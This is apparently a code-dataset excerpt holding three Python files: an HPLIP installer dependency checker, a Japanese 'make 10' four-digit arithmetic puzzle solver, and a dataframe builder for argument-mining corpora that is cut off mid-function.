max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
hplip-3.20.3/installer/dcheck.py | Deril-Pana/wikiBlackcoinNL | 0 | 12765051 | <reponame>Deril-Pana/wikiBlackcoinNL<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# (c) Copyright 2003-2015 HP Development Company, L.P.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Author: <NAME>
#
# Std Lib
import os
import os.path
import re
import sys
from subprocess import Popen, PIPE
import codecs
# Local
from base.g import *
from base import utils, services
from base.sixext import to_bytes_utf8
ver1_pat = re.compile("""(\d+\.\d+\.\d+)""", re.IGNORECASE)
ver_pat = re.compile("""(\d+.\d+)""", re.IGNORECASE)
PID = 0
CMDLINE = 1
ld_output = ''
#ps_output = ''
mod_output = ''
def update_ld_output():
# For library checks
global ld_output
status, ld_output = utils.run('%s -p' % os.path.join(utils.which('ldconfig'), 'ldconfig'), log_output=False)
if status != 0:
log.debug("ldconfig failed.")
def check_tool(cmd, min_ver=0.0):
log.debug("Checking: %s (min ver=%f)" % (cmd, min_ver))
status, output = utils.run(cmd)
if status != 0:
log.debug("Not found!")
return False
else:
if min_ver:
try:
line = output.splitlines()[0]
except IndexError:
line = ''
log.debug(line)
match_obj = ver_pat.search(line)
try:
ver = match_obj.group(1)
except AttributeError:
ver = ''
try:
v_f = float(ver)
except ValueError:
return False
else:
log.debug("Ver=%f Min ver=%f" % (v_f, min_ver))
if v_f < min_ver:
log.debug("Found, but newer version required.")
return v_f >= min_ver
else:
log.debug("Found.")
return True
def check_lib(lib, min_ver=0):
log.debug("Checking for library '%s'..." % lib)
if ld_output.find(lib) >= 0:
log.debug("Found.")
#if min_ver:
# pass
#else:
return True
else:
log.debug("Not found.")
return False
def check_file(f, dir="/usr/include"):
log.debug("Searching for file '%s' in '%s'..." % (f, dir))
for w in utils.walkFiles(dir, recurse=True, abs_paths=True, return_folders=False, pattern=f):
log.debug("File found at '%s'" % w)
return True
log.debug("File not found.")
return False
def locate_files(f, dir):
log.debug("Searching for file(s) '%s' in '%s'..." % (f, dir))
found = []
for w in utils.walkFiles(dir, recurse=True, abs_paths=True, return_folders=False, pattern=f):
log.debug(w)
found.append(w)
if found:
log.debug("Found files: %s" % found)
else:
log.debug("No files not found.")
return found
def locate_file_contains(f, dir, s):
"""
Find a list of files located in a directory
that contain a specified sub-string.
"""
log.debug("Searching for file(s) '%s' in '%s' that contain '%s'..." % (f, dir, s))
found = []
for w in utils.walkFiles(dir, recurse=True, abs_paths=True, return_folders=False, pattern=f):
if check_file_contains(w, s):
log.debug(w)
found.append(w)
if found:
log.debug("Found files: %s" % found)
else:
log.debug("No files not found.")
return found
def check_file_contains(f, s):
log.debug("Checking file '%s' for contents '%s'..." % (f, s))
try:
if os.path.exists(f):
s = to_bytes_utf8(s)
for a in open(f, 'rb'):
update_spinner()
if s in a:
log.debug("'%s' found in file '%s'." % (s.replace(b'\n', b''), f))
return True
log.debug("Contents not found.")
return False
finally:
cleanup_spinner()
def check_ps(process_list):
if process_list is not None:
log.debug("Searching for '%s' in running processes..." % process_list)
try:
for p in process_list:
update_spinner()
status,process = utils.Is_Process_Running(p)
if status is True:
for p in process:
log.debug("Found: %s (%s)" % (process[p], p))
return True
log.debug("Not found")
return False
finally:
cleanup_spinner()
def get_ps_pid(process_name_list):
processes_list = {}
if process_name_list is not None:
log.debug("Searching for '%s' in running processes..." % process_name_list)
try:
for p in process_name_list:
update_spinner()
status,processes = utils.Is_Process_Running(p)
if status is True:
log.debug("Found: %d processes" % len(processes))
for pid in processes:
processes_list[pid] =processes[pid]
else:
log.debug("Not found")
finally:
cleanup_spinner()
return processes_list
def check_lsmod(module):
global mod_output
if not mod_output:
lsmod = utils.which('lsmod')
status, mod_output = utils.run(os.path.join(lsmod, 'lsmod'), log_output=False)
return mod_output.find(module) >= 0
def check_version(inst_ver_str, min_ver_str='0.0'):
log.debug("Checking: installed ver=%s min ver=%s" % (inst_ver_str, min_ver_str))
min_ver = 0
if min_ver_str != '-':
match_obj=ver_pat.search(min_ver_str)
try:
ver = match_obj.group(1)
except AttributeError:
ver = ''
try:
min_ver = float(ver)
except ValueError:
min_ver = 0
inst_ver = 0
if inst_ver_str != '-':
match_obj=ver_pat.search(inst_ver_str)
try:
ver = match_obj.group(1)
except AttributeError:
ver = ''
try:
inst_ver = float(ver)
except ValueError:
inst_ver = 0
if inst_ver < min_ver:
log.debug("Found, but newer version required.")
return False
else:
log.debug("Found.")
return True
def get_version(cmd,def_ver='-'):
log.debug("Checking: %s" % (cmd))
status, output = utils.run(cmd)
if status != 0:
log.debug("Not found!")
return def_ver
else:
try:
line = output.splitlines()[0]
except IndexError:
line = ''
log.debug(line)
match_obj = ver1_pat.search(line)
try:
ver = match_obj.group(1)
except AttributeError:
match_obj = ver_pat.search(line)
try:
ver = match_obj.group(1)
except AttributeError:
return def_ver
else:
return ver
else:
return ver
def get_python_dbus_ver():
try:
import dbus
dbus_version ="-"
try:
dbus_version = dbus.__version__
except AttributeError:
try:
dbus_version = '.'.join([str(x) for x in dbus.version])
except AttributeError:
dbus_version = '-'
except ImportError:
dbus_version = '-'
return dbus_version
def get_pyQt4_version():
log.debug("Checking PyQt 4.x version...")
ver ='-'
# PyQt 4
try:
import PyQt4
except ImportError:
ver='-'
else:
from PyQt4 import QtCore
ver = QtCore.PYQT_VERSION_STR
return ver
def get_pyQt5_version():
log.debug("Checking PyQt 5.x version...")
ver ='-'
# PyQt 5
try:
import PyQt5
except ImportError:
ver='-'
else:
from PyQt5 import QtCore
ver = QtCore.PYQT_VERSION_STR
return ver
def get_reportlab_version():
try:
log.debug("Trying to import 'reportlab'...")
import reportlab
ver = str(reportlab.Version)
except ImportError:
return '-'
else:
return ver
def get_pyQt_version():
log.debug("Checking PyQt 3.x version...")
# PyQt 3
try:
import qt
except ImportError:
return '-'
else:
#check version of PyQt
try:
pyqtVersion = qt.PYQT_VERSION_STR
except AttributeError:
pyqtVersion = qt.PYQT_VERSION
while pyqtVersion.count('.') < 2:
pyqtVersion += '.0'
return pyqtVersion
def get_xsane_version():
installed_ver='-'
try:
p1 = Popen(["xsane", "--version","2",">","/dev/null"], stdout=PIPE)
except:
output =None
else:
output=p1.communicate()[0].decode('utf-8')
if output:
xsane_ver_pat =re.compile('''xsane-(\d{1,}\.\d{1,}).*''')
xsane_ver_info = output.splitlines()[0]
if xsane_ver_pat.search(xsane_ver_info):
installed_ver = xsane_ver_pat.search(xsane_ver_info).group(1)
return installed_ver
def get_pil_version():
try:
from PIL import Image
except ImportError:
return '-'
else:
return Image.PILLOW_VERSION
def get_libpthread_version():
try:
import sys, ctypes, ctypes.util
except ImportError:
return '-'
else:
# LIBC = ctypes.CDLL(ctypes.util.find_library('c'), use_errno=True)
LIBC = ctypes.CDLL(ctypes.util.find_library('c'),ctypes.DEFAULT_MODE,None, True)
LIBC.gnu_get_libc_version.restype = ctypes.c_char_p
return LIBC.gnu_get_libc_version()
def get_python_xml_version():
try:
import xml.parsers.expat
except ImportError:
return '-'
else:
return '.'.join([str(x) for x in xml.parsers.expat.version_info])
def get_HPLIP_version():
return prop.version
def get_libusb_version():
if sys_conf.get('configure', 'libusb01-build', 'no') == "yes":
return get_version('libusb-config --version')
else:
return '1.0'
| 1.773438 | 2 |
solve_v2.py | EliotNapa/urban_hacks | 0 | 12765052 | # -*- coding: utf-8 -*-
"""
"""
import copy
import time
import itertools
class CalcRecord():
"""
逆ポーランド用の要素格納クラス
"""
def __init__(self, a,b,c,d,op1,op2,op3):
self.a = a
self.b = b
self.c = c
self.d = d
self.op1 = op1
self.op2 = op2
self.op3 = op3
self.result = -1
def print(self):
print("{0} {1} {2} {3} {4} {5} {6} {7}".format(
self.a,
self.b,
self.c,
self.d,
self.op1,
self.op2,
self.op3,
self.result
))
def main():
t1 = time.time()
exist_count = 0
# src_list, count = calc_puzle(1, 3, 3, 7, detail_print = True)
# src_list, count = calc_puzle(4, 6, 7, 9, detail_print = True)
# if count > 0:
# exist_count += 1
# print("{0} count = {1}".format(src_list, count))
#
#数字の重複を省く
#(1,2,3,1) === (1,1,2,3)
for a in range(0, 10):
for b in range(a, 10):
for c in range(b, 10):
for d in range(c, 10):
src_list, count = calc_puzle(a, b, c, d, detail_print = False)
print("{0} count = {1}".format(src_list, count))
if count > 0:
exist_count += 1
print("成立個数:{0}".format(exist_count))
t2 = time.time()
print("実行時間:{0}".format(t2-t1))
def calc_puzle(a,b,c,d, detail_print = False):
ans_count = 0
#問題文数字リスト
src_nums = [str(a), str(b), str(c), str(d)]
#演算子リスト
oprs = ["+", "-", "*", "/"]
#順列を作成する
permu_list = list(itertools.permutations(src_nums))
#演算子の組み合わせを作成する
op_list= list(itertools.product(oprs, repeat=3))
#逆ポーランド式要素全順列格納用リスト
calc_list = []
for op_set in op_list:
for one_line in permu_list:
calc_list.append(CalcRecord(
one_line[0],
one_line[1],
one_line[2],
one_line[3],
op_set[0],
op_set[1],
op_set[2]
))
calc_work = []
#逆ポーランド式要素全順列より4パターンの
#逆ポーランド演算式を計算し答えを求める
for cur_calc in calc_list:
calc_work.clear()
#逆ポーランド演算式1
# A B op1 C D op2 op3
# (A op1 B) op3 (C op2 D)
calc_work.append(cur_calc.a)
calc_work.append(cur_calc.b)
exec_revpol(cur_calc.op1, calc_work)
calc_work.append(cur_calc.c)
calc_work.append(cur_calc.d)
exec_revpol(cur_calc.op2, calc_work)
exec_revpol(cur_calc.op3, calc_work)
cur_calc.result = calc_work.pop()
# print_formula(cur_calc, "F1")
if 10 == cur_calc.result:
ans_count += 1
if detail_print:
print_formula(cur_calc, "F1")
# return [src_nums, ans_count]
calc_work.clear()
#逆ポーランド演算式2
# A B op1 C op2 D op3
# ((A op1 B) op2 C) op3 D
calc_work.append(cur_calc.a)
calc_work.append(cur_calc.b)
exec_revpol(cur_calc.op1, calc_work)
calc_work.append(cur_calc.c)
exec_revpol(cur_calc.op2, calc_work)
calc_work.append(cur_calc.d)
exec_revpol(cur_calc.op3, calc_work)
cur_calc.result = calc_work.pop()
# print_formula(cur_calc, "F2")
if 10 == cur_calc.result:
ans_count += 1
if detail_print:
print_formula(cur_calc, "F2")
# return [src_nums, ans_count]
calc_work.clear()
#逆ポーランド演算式3
# A B C op1 op2 D op3
# (A op2 (B op1 C)) op3 D
calc_work.append(cur_calc.a)
calc_work.append(cur_calc.b)
calc_work.append(cur_calc.c)
exec_revpol(cur_calc.op1, calc_work)
exec_revpol(cur_calc.op2, calc_work)
calc_work.append(cur_calc.d)
exec_revpol(cur_calc.op3, calc_work)
cur_calc.result = calc_work.pop()
# print_formula(cur_calc, "F3")
if 10 == cur_calc.result:
ans_count += 1
if detail_print:
print_formula(cur_calc, "F3")
# return [src_nums, ans_count]
calc_work.clear()
#逆ポーランド演算式4
# A B C D op1 op2 op3
# A op3 (B op2 (C op1 D))
calc_work.append(cur_calc.a)
calc_work.append(cur_calc.b)
calc_work.append(cur_calc.c)
calc_work.append(cur_calc.d)
exec_revpol(cur_calc.op1, calc_work)
exec_revpol(cur_calc.op2, calc_work)
exec_revpol(cur_calc.op3, calc_work)
cur_calc.result = calc_work.pop()
# print_formula(cur_calc, "F4")
if 10 == cur_calc.result:
ans_count += 1
if detail_print:
print_formula(cur_calc, "F4")
# return [src_nums, ans_count]
return [src_nums, ans_count]
def print_formula(cur_calc, msg):
"""
逆ポーランド演算子表示
"""
if msg == "F1":
# A B op1 C D op2 op3
# (A op1 B) op3 (C op2 D)
print("{8}# {0} {1} {2} {3} {4} {5} {6}\n(({0} {2} {1}) {5} {3}) {6} {4} = {7}".format(
cur_calc.a,
cur_calc.b,
cur_calc.op1,
cur_calc.c,
cur_calc.d,
cur_calc.op2,
cur_calc.op3,
cur_calc.result,
msg
))
elif msg == "F2":
# A B op1 C op2 D op3
# ((A op1 B) op2 C) op3 D
print("{8}# {0} {1} {2} {3} {4} {5} {6}\n(({0} {2} {1}) {4} {3}) {6} {5}= {7}".format(
cur_calc.a,
cur_calc.b,
cur_calc.op1,
cur_calc.c,
cur_calc.op2,
cur_calc.d,
cur_calc.op3,
cur_calc.result,
msg
))
elif msg == "F3":
# A B C op1 op2 D op3
# (A op2 (B op1 C)) op3 D
print("{8}# {0} {1} {2} {3} {4} {5} {6}\n({0} {4} ({1} {3} {2})) {6} {5} = {7}".format(
cur_calc.a,
cur_calc.b,
cur_calc.c,
cur_calc.op1,
cur_calc.op2,
cur_calc.d,
cur_calc.op3,
cur_calc.result,
msg
))
else:
# A B C D op1 op2 op3
# A op3 (B op2 (C op1 D))
print("{8}# {0} {1} {2} {3} {4} {5} {6}\n{0} {6} ({1} {5}({2} {4} {3})) = {7}".format(
cur_calc.a,
cur_calc.b,
cur_calc.c,
cur_calc.d,
cur_calc.op1,
cur_calc.op2,
cur_calc.op3,
cur_calc.result,
msg
))
def exec_revpol(op, work_list):
"""
逆ポーランド演算を実施する
op - 演算子
work_list - 演算の要素と結果を格納するスタック
"""
s2 = work_list.pop()
s1 = work_list.pop()
if (s1 == "∞" or s2 == "∞"):
work_list.append("∞")
return
r2 = float(s2)
r1 = float(s1)
if op == "+":
# print("{0} {1} {2} = {3}".format(
# r1,
# op,
# r2,
# r1 + r2
# ))
work_list.append(r1 + r2)
elif op == "-":
# print("{0} {1} {2} = {3}".format(
# r1,
# op,
# r2,
# r1 - r2
# ))
work_list.append(r1 - r2)
elif op == "*":
# print("{0} {1} {2} = {3}".format(
# r1,
# op,
# r2,
# r1 * r2
# ))
work_list.append(r1 * r2)
elif op == "/":
if (0 == r2):
# print("{0} {1} {2} = {3}".format(
# r1,
# op,
# r2,
# "∞"
# ))
work_list.append("∞")
else:
# print("{0} {1} {2} = {3}".format(
# r1,
# op,
# r2,
# r1 / r2
# ))
work_list.append(r1 / r2)
if __name__ == '__main__':
main()
| 3.703125 | 4 |
dataframe_creator.py | Funny-Panda/StructurePrediction18 | 8 | 12765053 | <filename>dataframe_creator.py
__author__ = "<NAME>"
__copyright__ = "Copyright 2018-2020 <NAME>"
__license__ = "BSD 3-clause"
__version__ = "0.2.0"
__email__ = "<EMAIL>"
"""
Code to create a pandas dataframe from a specific corpus
"""
import os
import pandas
import json
import random
import sys
import ast
import numpy as np
import argparse
def split_propositions(text, propositions_offsets):
propositions = []
for offsets in propositions_offsets:
propositions.append(text[offsets[0]:offsets[1]])
return propositions
def create_preprocessed_cdcp_pickle(dataset_path, dataset_version, link_types, dataset_type='train', validation=0, reflexive=False):
data_path = os.path.join(dataset_path, dataset_version, dataset_type)
normal_list = []
validation_list = []
prop_counter = {}
rel_counter = {}
val_prop_counter = {}
val_rel_counter = {}
for i in range(2000):
file_name = "%05d" % (i)
text_file_path = os.path.join(data_path, file_name + ".txt")
if os.path.exists(text_file_path):
split = dataset_type
if validation > 0 and validation < 1:
p = random.random()
if p < validation:
split = 'validation'
text_file = open(text_file_path, 'r')
labels_file = open(os.path.join(data_path, file_name + ".ann.json"), 'r')
data = json.load(labels_file)
raw_text = text_file.read()
text_file.close()
labels_file.close()
propositions = split_propositions(raw_text, data['prop_offsets'])
if len(data['url'])>0:
print('URL! ' + str(i))
num_propositions = len(propositions)
if (num_propositions <= 1):
print('YEP!')
for sourceID in range(num_propositions):
type1 = data['prop_labels'][sourceID]
for targetID in range(num_propositions):
if sourceID == targetID and not reflexive:
continue
relation_type = None
relation1to2 = False
# relation type
for link_type in link_types:
links = data[link_type]
for link in links:
# DEBUG
# if not link[0][0] == link[0][1]:
# raise Exception('MORE PROPOSITIONS IN THE SAME RELATION: document ' + file_name)
if link[0] == sourceID and link[1] == targetID:
if relation_type is not None and not relation_type == link_type:
raise Exception('MORE RELATION FOR THE SAME PROPOSITIONS: document ' + file_name)
relation_type = link_type
relation1to2 = True
elif link[0] == targetID and link[1] == sourceID:
relation_type = "inv_" + link_type
# proposition type
type2 = data['prop_labels'][targetID]
dataframe_row = {'text_ID': i,
'rawtext': raw_text,
'source_proposition': propositions[sourceID],
'source_ID': str(i) + "_" + str(sourceID),
'target_proposition': propositions[targetID],
'target_ID': str(i) + "_" + str(targetID),
'source_type': type1,
'target_type': type2,
'relation_type': relation_type,
'source_to_target': relation1to2,
'set': split
}
if split == 'validation':
validation_list.append(dataframe_row)
if relation_type not in val_rel_counter.keys():
val_rel_counter[relation_type] = 0
val_rel_counter[relation_type] += 1
else:
normal_list.append(dataframe_row)
if relation_type not in rel_counter.keys():
rel_counter[relation_type] = 0
rel_counter[relation_type] += 1
if split == 'validation':
if type1 not in val_prop_counter.keys():
val_prop_counter[type1] = 0
val_prop_counter[type1] += 1
else:
if type1 not in prop_counter.keys():
prop_counter[type1] = 0
prop_counter[type1] += 1
pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
if not os.path.exists(pickles_path):
os.makedirs(pickles_path)
if len(normal_list)>0:
dataframe = pandas.DataFrame(normal_list)
dataframe = dataframe[['text_ID',
'rawtext',
'source_proposition',
'source_ID',
'target_proposition',
'target_ID',
'source_type',
'target_type',
'relation_type',
'source_to_target',
'set']]
dataframe_path = os.path.join(pickles_path, dataset_type + ".pkl")
dataframe.to_pickle(dataframe_path)
if len(validation_list) > 0:
dataframe = pandas.DataFrame(validation_list)
dataframe = dataframe[['text_ID',
'rawtext',
'source_proposition',
'source_ID',
'target_proposition',
'target_ID',
'source_type',
'target_type',
'relation_type',
'source_to_target',
'set']]
dataframe_path = os.path.join(pickles_path, 'validation' + ".pkl")
dataframe.to_pickle(dataframe_path)
print("_______________")
print(dataset_type)
print(prop_counter)
print(rel_counter)
print("_______________")
print("VALIDATION")
print(val_prop_counter)
print(val_rel_counter)
print("_______________")
def create_scidtb_pickle(dataset_path, dataset_version, documents_path,
asymmetric_link_types, symmetric_link_types, a_non_link_types, s_non_link_types,
test=0.0, validation=0.0, reflexive=False):
print()
for key in sorted(locals().keys()):
print(str(key) + ":\t" + str(locals()[key]))
token_counter = 0
sentence_counter = 0
assert (validation >= 0 and validation <= 1)
assert (test >= 0 and test <= 1)
relation_types = []
relation_types.extend(asymmetric_link_types)
relation_types.extend(a_non_link_types)
relation_types.extend(symmetric_link_types)
relation_types.extend(s_non_link_types)
row_list_sent = {"train":[], "test":[], "validation":[]}
row_list = {"train":[], "test":[], "validation":[]}
rel_count = {"train":{}, "test":{}, "validation":{}}
prop_count = {"train":{}, "test":{}, "validation":{}}
link_count = {"train":0, "test":0, "validation":0}
data = {'prop_labels': {},
'T_ids': [],
'propositions': {},
}
rows_by_id = {}
documents_paths_list = []
documents_names_list = os.listdir(documents_path)
for document_name in documents_names_list:
documents_paths_list.append(os.path.join(documents_path, document_name))
del documents_names_list
print(str(len(documents_paths_list)) + " documents found for " + documents_path)
sentences_rows = []
for document_path in documents_paths_list:
document_name = os.path.basename(document_path)
if ".conll" not in document_name:
continue
doc_ID = int(document_name.split("-")[1][:])
split = "train"
if validation > 0 or test > 0:
p = random.random()
if p < validation:
split = 'validation'
elif validation < p < test + validation:
split = "test"
original_file = open(document_path, 'r', encoding="utf-8")
raw_text = original_file.read()
original_file.close()
sentence = ""
current_label = ""
count = 0
sent_id = 0
sent_ids = []
for line in raw_text.split('\n'):
if len(line)<5:
continue
token_counter += 1
sentence_splits = line.split()
text = sentence_splits[0]
label = sentence_splits[1]
if label[0] == "B" or sentence == "":
# if it is the first line
if len(sentence) > 1:
current_label = current_label.replace("-", ".")
current_label = current_label.replace("..", ".-")
labels_splits = current_label.split(".")
source_type = labels_splits[1]
relation_type = labels_splits[2]
source_to_target = False
target_offset = labels_splits[3]
source_id = str(doc_ID) + "_" + str(sent_id)
target_id = ""
if relation_type in relation_types:
target_id = str(doc_ID) + "_" + str(sent_id + int(target_offset))
else:
relation_type = None
if (relation_type in asymmetric_link_types) or (relation_type in symmetric_link_types):
source_to_target = True
sentences_row = {'text_ID': doc_ID,
'source_ID': source_id,
'target_ID': target_id,
'source_type': source_type,
'relation_type': relation_type,
'source_to_target': source_to_target,
'set': split,
'source_length': count,
'source_proposition': sentence,
}
rows_by_id[source_id] = sentences_row
sentences_rows.append(sentences_row)
sent_ids.append(source_id)
sent_id += 1
sentence = text
current_label = label
count = 0
elif label[0] == "O":
print("WHAAAT?!? There's a O!!!")
exit(-4)
else:
assert current_label[1:] == label[1:]
sentence += " " + text
count += 1
# include last sentence
if len(sentence) > 1:
current_label = current_label.replace("-", ".")
current_label = current_label.replace("..", ".-")
labels_splits = current_label.split(".")
source_type = labels_splits[1]
relation_type = labels_splits[2]
source_to_target = False
target_offset = labels_splits[3]
source_id = str(doc_ID) + "_" + str(sent_id)
target_id = ""
if relation_type in relation_types:
target_id = str(doc_ID) + "_" + str(sent_id + int(target_offset))
else:
relation_type = None
if (relation_type in asymmetric_link_types) or (relation_type in symmetric_link_types):
source_to_target = True
sentences_row = {'text_ID': doc_ID,
'source_ID': source_id,
'target_ID': target_id,
'source_type': source_type,
'relation_type': relation_type,
'source_to_target': source_to_target,
'set': split,
'source_length': count,
'source_proposition': sentence,
}
rows_by_id[source_id] = sentences_row
sentences_rows.append(sentences_row)
sent_ids.append(source_id)
sent_id += 1
if len(sent_ids) == 1:
print("Document " + str(doc_ID) + " has only 1 sentence!")
# addition to couples dataframe
for sent_id_source in sent_ids:
source_row = rows_by_id[sent_id_source]
for sent_id_target in sent_ids:
if sent_id_source == sent_id_target and not reflexive:
continue
target_row = rows_by_id[sent_id_target]
relation_type = None
relation1to2 = False
if source_row["target_ID"] == sent_id_target:
relation_type = source_row["relation_type"]
relation1to2 = source_row["source_to_target"]
elif target_row["target_ID"] == sent_id_source:
relation_type = "inv_" + str(target_row["relation_type"])
dataframe_row = {'text_ID': str(doc_ID),
'source_proposition': source_row["source_proposition"],
'source_ID': str(sent_id_source),
'target_proposition': target_row["source_proposition"],
'target_ID': str(sent_id_target),
'source_type': source_row["source_type"],
'target_type': target_row["source_type"],
'relation_type': relation_type,
'source_to_target': relation1to2,
'source_length': source_row["source_length"],
'target_length': target_row["source_length"],
'set': split
}
row_list[split].append(dataframe_row)
# CONTATORI
"""
if relation_type not in rel_count.keys():
rel_count[relation_type] = 0
rel_count[relation_type] += 1
if relation1to2 == True:
link_count += 1
"""
pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
if not os.path.exists(pickles_path):
os.makedirs(pickles_path)
if len(sentences_rows) > 0:
dataframe = pandas.DataFrame(sentences_rows)
dataframe = dataframe[['text_ID',
'source_proposition',
'source_ID',
# 'target_proposition',
'target_ID',
'source_type',
# 'target_type',
'relation_type',
'source_to_target',
'source_length',
# 'target_length',
'set']]
dataframe_path = os.path.join(pickles_path, "sentences.pkl")
dataframe.to_pickle(dataframe_path)
for split in ["train", "validation", "test"]:
if len(row_list[split]) > 0:
dataframe = pandas.DataFrame(row_list[split])
dataframe = dataframe[['text_ID',
'source_ID',
'target_ID',
'source_type',
'target_type',
'relation_type',
'source_to_target',
'source_length',
'target_length',
'source_proposition',
'target_proposition',
'set']]
dataframe_path = os.path.join(pickles_path, str(split) + ".pkl")
dataframe.to_pickle(dataframe_path)
print("TOKENS!")
print(token_counter)
ukp_train_ids = [1, 2, 3, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36,
37, 38, 39, 40, 41, 43, 44, 45, 46, 47, 48, 49, 50, 51, 53,
54, 55, 56, 57, 58, 59, 60, 62, 63, 64, 65, 66, 67, 69, 70,
73, 74, 75, 76, 78, 79, 80, 81, 83, 84, 85, 87, 88, 89, 90,
92, 93, 94, 95, 96, 99, 100, 101, 102, 105, 106, 107, 109,
110, 111, 112, 113, 114, 115, 116, 118, 120, 121, 122, 123,
124, 125, 127, 128, 130, 131, 132, 133, 134, 135, 137, 138,
140, 141, 143, 144, 145, 146, 147, 148, 150, 151, 152, 153,
155, 156, 157, 158, 159, 161, 162, 164, 165, 166, 167, 168,
170, 171, 173, 174, 175, 176, 177, 178, 179, 181, 183, 184,
185, 186, 188, 189, 190, 191, 194, 195, 196, 197, 198, 200,
201, 203, 205, 206, 207, 208, 209, 210, 213, 214, 215, 216,
217, 219, 222, 223, 224, 225, 226, 228, 230, 231, 232, 233,
235, 236, 237, 238, 239, 242, 244, 246, 247, 248, 249, 250,
251, 253, 254, 256, 257, 258, 260, 261, 262, 263, 264, 267,
268, 269, 270, 271, 272, 273, 274, 275, 276, 279, 280, 281,
282, 283, 284, 285, 286, 288, 290, 291, 292, 293, 294, 295,
296, 297, 298, 299, 300, 302, 303, 304, 305, 307, 308, 309,
311, 312, 313, 314, 315, 317, 318, 319, 320, 321, 323, 324,
325, 326, 327, 329, 330, 332, 333, 334, 336, 337, 338, 339,
340, 342, 343, 344, 345, 346, 347, 349, 350, 351, 353, 354,
356, 357, 358, 360, 361, 362, 363, 365, 366, 367, 368, 369,
370, 371, 372, 374, 375, 376, 377, 378, 379, 380, 381, 383,
384, 385, 387, 388, 389, 390, 391, 392, 394, 395, 396, 397,
399, 400, 401, 402]
ukp_test_ids = [4, 5, 6, 21, 42, 52, 61, 68, 71, 72, 77, 82, 86, 91, 97, 98,
103, 104, 108, 117, 119, 126, 129, 136, 139, 142, 149, 154,
160, 163, 169, 172, 180, 182, 187, 192, 193, 199, 202, 204,
211, 212, 218, 220, 221, 227, 229, 234, 240, 241, 243, 245,
252, 255, 259, 265, 266, 277, 278, 287, 289, 301, 306, 310,
316, 322, 328, 331, 335, 341, 348, 352, 355, 359, 364, 373,
382, 386, 393, 398]
def create_ukp_pickle(dataset_path, dataset_version, link_types, dataset_type='train', validation=0, reflexive=False):
data_path = os.path.join(dataset_path, "original_data")
normal_list = []
validation_list = []
idlist = []
if (dataset_type=='train'):
idlist = ukp_train_ids
elif (dataset_type=='test'):
idlist = ukp_test_ids
else:
idlist = range(500)
prop_counter = {}
rel_counter = {}
val_prop_counter = {}
val_rel_counter = {}
for i in idlist:
file_name = "essay" + "%03d" % (i)
text_file_path = os.path.join(data_path, file_name + ".txt")
if os.path.exists(text_file_path):
split = dataset_type
if validation > 0 and validation < 1:
p = random.random()
if p < validation:
split = 'validation'
text_file = open(text_file_path, 'r', encoding='utf-8')
labels_file = open(os.path.join(data_path, file_name + ".ann"), 'r')
labels_line = []
raw_text = text_file.read()
for splits in labels_file.read().split('\n'):
labels_line.append(splits)
text_file.close()
labels_file.close()
# elaborate the offsets of the paragraphs
paragraphs_offsets = []
start = 0
while start < len(raw_text):
try:
end = raw_text.index("\n", start)
except ValueError:
end = len(raw_text)
if end != start:
paragraphs_offsets.append([start, end])
start = end + 1
data = {'prop_labels': {},
'prop_offsets': {},
'start_offsets': {},
'T_ids': [],
'propositions': {}}
for link_type in link_types:
data[link_type] = []
paragraphs = split_propositions(raw_text, paragraphs_offsets)
for line in labels_line:
splits = line.split(maxsplit=4)
if len(splits) <= 0:
continue
if splits[0][0] == 'T':
T_id = int(splits[0][1:])-1
data['T_ids'].append(T_id)
data['prop_labels'][T_id] = splits[1]
data['prop_offsets'][T_id] = [int(splits[2]), int(splits[3])]
data['start_offsets'][int(splits[2])] = T_id
data['propositions'][T_id] = splits[4].split('\n')
elif splits[0][0] == 'R':
source = int(splits[2][6:]) - 1
target = int(splits[3][6:]) - 1
data[splits[1]].append([source, target])
# new order given by the start offsets
new_order = {}
new_id = 0
# find the match between the starting offsets and set the new id
for new_off in sorted(data['start_offsets'].keys()):
for old_id in data['T_ids']:
old_off = data['prop_offsets'][old_id][0]
if new_off == old_off:
new_order[old_id] = new_id
new_id += 1
break
new_data = {'prop_labels': [-1]*len(data['prop_labels']),
'prop_offsets': [-1]*len(data['prop_labels']),
'propositions': [-1]*len(data['prop_labels']),}
for link_type in link_types:
new_data[link_type] = []
for link_type in link_types:
for link in data[link_type]:
old_source = link[0]
old_target = link[1]
new_source = new_order[old_source]
new_target = new_order[old_target]
new_data[link_type].append([new_source, new_target])
for old_id in data['T_ids']:
new_id = new_order[old_id]
new_data['prop_labels'][new_id] = data['prop_labels'][old_id]
new_data['prop_offsets'][new_id] = data['prop_offsets'][old_id]
new_data['propositions'][new_id] = data['propositions'][old_id]
data = new_data
propositions = data['propositions']
num_propositions = len(propositions)
assert (num_propositions >= 1)
for sourceID in range(num_propositions):
source_start = data['prop_offsets'][sourceID][0]
p_offsets = (-1, -1)
par = -1
# find the paragraph
for paragraph in range(len(paragraphs)):
p_start = paragraphs_offsets[paragraph][0]
p_end = paragraphs_offsets[paragraph][1]
if p_end >= source_start >= p_start:
p_offsets = (p_start, p_end)
par = paragraph
assert par != -1
type1 = data['prop_labels'][sourceID]
for targetID in range(num_propositions):
# proposition type
type2 = data['prop_labels'][targetID]
target_start = data['prop_offsets'][targetID][0]
if sourceID == targetID and not reflexive:
continue
# relations in different paragraphs are not allowed
if target_start < p_offsets[0] or target_start > p_offsets[1]:
continue
relation_type = None
relation1to2 = False
# relation type
for link_type in link_types:
links = data[link_type]
for link in links:
# DEBUG
# if not link[0][0] == link[0][1]:
# raise Exception('MORE PROPOSITIONS IN THE SAME RELATION: document ' + file_name)
if link[0] == sourceID and link[1] == targetID:
if relation_type is not None and not relation_type == link_type:
